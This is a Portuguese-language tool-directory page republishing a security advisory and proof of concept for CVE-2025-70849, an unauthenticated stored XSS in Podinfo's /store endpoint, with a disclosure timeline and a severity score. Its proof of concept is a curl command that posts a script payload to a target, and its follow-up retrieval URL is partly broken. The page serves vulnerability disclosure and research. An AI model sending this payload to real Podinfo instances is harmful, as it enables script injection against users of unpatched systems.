Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-70849-Podinfo — PoC e Advisory para CVE-2025-70849: XSS armazenado não autenticado no endpoint /store do Podinfo. | Kitploit
Ferramentas/GitHubGitHub/kazisabu/cve-2025-70849-podinfo
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubkazisabu/cve-2025-70849-podinfo

CVE-2025-70849-Podinfo

PoC e Advisory para CVE-2025-70849: XSS armazenado não autenticado no endpoint /store do Podinfo.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-70849: XSS Armazenado no Podinfo

Resumo

Uma vulnerabilidade de segurança (CWE-79) foi identificada no Podinfo, uma aplicação web para demonstrar microsserviços Kubernetes. O recurso /store permite que usuários não autenticados carreguem conteúdo HTML/JS arbitrário, resultando em XSS Armazenado.

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-70849
  • Produto: Podinfo
  • Endpoint Afetado: /store
  • Tipo de Vulnerabilidade: Cross-Site Scripting (XSS) Armazenado
  • Versões Afetadas: <= 6.10.0

Prova de Conceito (PoC)

  1. Envie o payload malicioso:
    root@kitploit:~
    curl -X POST https://<target>/store -H "Content-Type: application/text" -d '<html><script>alert("CVE-2025-70849")</script></html>'
    
  • Acesse o hash retornado: https:///store/
  • Linha do Tempo

    • Descoberta: Set 2025
    • Notificação ao Fornecedor: 25 OUT 2025
    • Resposta do Fornecedor: Reconhecida; informou que não há um prazo atual para correção.
    • Divulgação Pública: Fevereiro 2026

    Aviso Legal Esta pesquisa é apenas para fins educacionais.

    Pesquisadores :

    Kazi Sabbir | Shafayet Ahmed Alif

    Gravidade: Média 6.4

    Baixar ferramenta